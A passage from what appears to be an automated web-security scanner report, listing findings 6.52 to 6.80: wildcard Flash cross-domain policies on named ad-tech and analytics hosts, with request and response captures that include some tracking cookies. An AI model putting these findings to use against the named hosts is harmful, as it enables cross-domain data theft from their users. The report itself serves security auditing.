ETag: "d4820b-d0-48821fe531a40"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.52. http://qlog.adap.tv/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://qlog.adap.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: qlog.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"; audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"2\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}"; asptvw1="ap4148%2C1%2C2011-09-03%2F18-44-50"; rtbData0="key=tidaltv:value=dd4e867c-c693-47de-91e1-d466af06b7be:expiresAt=Wed+Nov+02+17%3A44%3A51+PDT+2011:32-Compatible=true"

Response

HTTP/1.0 200 OK
Content-Type: application/xml
Connection: Keep-Alive
Content-Length: 204

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic
...[SNIP]...

6.53. http://r.turn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 01:06:01 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 01:06:00 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.54. http://rcv-srv48.inplay.tubemogul.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://rcv-srv48.inplay.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rcv-srv48.inplay.tubemogul.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1314384909000"
Last-Modified: Fri, 26 Aug 2011 18:55:09 GMT
host: rcv-srv48
Content-Type: application/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 01:28:49 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.55. http://receive.inplay.tubemogul.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://receive.inplay.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: receive.inplay.tubemogul.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tmid=-5675633421699857517

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1314196443000"
Last-Modified: Wed, 24 Aug 2011 14:34:03 GMT
host: rcv-srv17
Content-Type: application/xml
Content-Length: 204
Date: Sun, 04 Sep 2011 01:17:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.56. http://redir.adap.tv/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://redir.adap.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: redir.adap.tv

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "6c4eab00cd774ab5a7cc17b4370cc452:1314901110"
Last-Modified: Thu, 01 Sep 2011 18:18:30 GMT
Accept-Ranges: bytes
Content-Length: 207
Content-Type: application/xml
Date: Sun, 04 Sep 2011 01:05:28 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-domain-po
...[SNIP]...

6.57. http://s0.2mdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 03 Sep 2011 23:16:31 GMT
Expires: Fri, 02 Sep 2011 23:16:00 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 5295
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.58. http://s3.cinesport.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s3.cinesport.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s3.cinesport.com

Response

HTTP/1.1 200 OK
x-amz-id-2: HJPWt1++478t1MkKTXsRWRAZcqPlaICP21rPc6XhuXcwNUsultrjb1lWrGlrIox4
x-amz-request-id: 832C78F5B320E530
Date: Sun, 04 Sep 2011 01:03:57 GMT
x-amz-meta-s3fox-filesize: 204
x-amz-meta-s3fox-modifiedtime: 1254865363318
Last-Modified: Tue, 06 Oct 2009 21:49:18 GMT
ETag: "199ac761aefc6dd785276dfea364b271"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 204
Connection: keep-alive
Server: AmazonS3

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

6.59. http://search.spotxchange.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.spotxchange.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.spotxchange.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:45 GMT
Server: Apache
Last-Modified: Mon, 28 Feb 2011 23:42:39 GMT
ETag: "c41e69-8b-4d6c32ef"
Accept-Ranges: bytes
Content-Length: 139
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.60. http://secure-us.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:52:32 GMT
Content-Type: text/xml
Content-Length: 268
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
Connection: close
Expires: Sun, 11 Sep 2011 00:52:32 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

6.61. http://segments.adap.tv/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://segments.adap.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segments.adap.tv

Response

HTTP/1.0 200 OK
Content-Type: application/xml
Connection: close
Content-Length: 204

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic
...[SNIP]...

6.62. http://simg.zedo.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://simg.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: simg.zedo.com

Response

HTTP/1.0 200 OK
Age: 0
Content-Type: application/xml
Date: Sun, 04 Sep 2011 01:05:11 GMT
Edge-Control: dca=esi
ETag: "32e623-f7-44d91a42f42c0"
Last-Modified: Mon, 19 May 2008 09:03:47 GMT
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Server: ZEDO 3G
Content-Length: 247
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.63. https://socialize.gigya.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://socialize.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: socialize.gigya.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:0"
Server: Microsoft-IIS/7.5
X-Server: web503
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
Date: Sun, 04 Sep 2011 01:24:16 GMT
Connection: close
Content-Length: 341

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

6.64. http://sprint.tt.omtrdc.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sprint.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sprint.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Sun, 04 Sep 2011 00:45:31 GMT
Accept-Ranges: bytes
ETag: W/"201-1313024241000"
Connection: close
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

6.65. http://statse.webtrendslive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:8bf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:56:18 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.66. http://studio-5.financialcontent.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://studio-5.financialcontent.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: studio-5.financialcontent.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:24:19 GMT
Server: nginx/0.8.15
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sun, 04 Sep 2011 01:24:19 GMT
X-Cache: MISS from squid2.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid2.sv1.financialcontent.com:3128
Via: 1.0 squid2.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.67. http://sync.adap.tv/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.adap.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.adap.tv

Response

HTTP/1.0 200 OK
Content-Type: application/xml
Connection: close
Content-Length: 204

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic
...[SNIP]...

6.68. http://sync.mathtag.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xca8 3240
Set-Cookie: ts=1315099467; domain=.mathtag.com; path=/; expires=Mon, 03-Sep-2012 01:24:27 GMT
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

6.69. http://sync.tidaltv.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://sync.tidaltv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: sync.tidaltv.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sun, 04 Sep 2011 01:11:58 GMT
ETag: "da861e55beecca1:17eb"
Last-Modified: Thu, 06 May 2010 01:49:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 78
Connection: keep-alive

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.70. http://tags.bluekai.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 00:48:05 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "11003d9-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

6.71. http://tcr.tynt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tcr.tynt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/xml
Date: Sun, 04 Sep 2011 01:06:33 GMT
ETag: "251523935"
Expires: Sun, 04 Sep 2011 01:36:33 GMT
Last-Modified: Tue, 10 Nov 2009 16:25:33 GMT
Server: ECS (sjo/5227)
X-Cache: HIT
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.72. http://traffic.outbrain.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://traffic.outbrain.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: traffic.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"201-1311068652000"
Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT
Content-Type: application/xml
Content-Length: 201
Date: Sun, 04 Sep 2011 01:24:37 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.73. http://trc.taboolasyndication.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: trc.taboolasyndication.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 00:50:47 GMT
Content-Type: text/xml
Content-Length: 409
Last-Modified: Sun, 10 Jul 2011 17:16:59 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
...[SNIP]...

6.74. http://usatoday1.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:42:19 GMT
Server: Omniture DC/2.0.0
xserver: www94
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.75. http://vast.ap919.btrll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://vast.ap919.btrll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: vast.ap919.btrll.com
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BR_MBBV=Ak5fqqZQd%2Fl1AQAWXfM; DRN1=AGPa-U7XtK4

Response

HTTP/1.1 200 OK
Connection: close
Content-Type: application/xml
Cache-Control: max-age=7776000
Date: Sun, 04 Sep 2011 01:12:49 GMT
Content-Length: 269

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.76. http://video.od.visiblemeasures.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.od.visiblemeasures.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: video.od.visiblemeasures.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=500&flashID=myExperience&bgcolor=%23F4F4F4&wmode=opaque&dynamicStreaming=true&videoSmoothing=true&playerID=1055201224001&publisherID=315980433&isVid=true&autoStart=false&isUI=true&allowScriptAccess=always&debuggerID=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 04 Sep 2011 01:17:21 GMT
Content-Type: text/xml
Content-Length: 169
Last-Modified: Tue, 01 Mar 2011 06:21:28 GMT
X-Cnection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="master-only"/>
</cross-domain-policy>

6.77. http://wac.3a03.edgecastcdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://wac.3a03.edgecastcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wac.3a03.edgecastcdn.net

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sun, 04 Sep 2011 00:44:51 GMT
Last-Modified: Tue, 08 Mar 2011 05:43:30 GMT
Server: ECS (sjo/5227)
Content-Length: 203
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-domain-polic
...[SNIP]...

6.78. http://www.goutsa.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.goutsa.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.goutsa.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:15 GMT
Server: Apache
Last-Modified: Mon, 09 Mar 2009 13:39:57 GMT
ETag: "5e-464afc52da540"
Accept-Ranges: bytes
Content-Length: 94
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
</cross-domain-policy>

6.79. http://www.wunderground.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wunderground.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wunderground.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:36 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Last-Modified: Thu, 05 May 2011 20:05:54 GMT
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.80. http://www.zvents.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.zvents.com
Path:   /crossdomain.xml

Issue detail
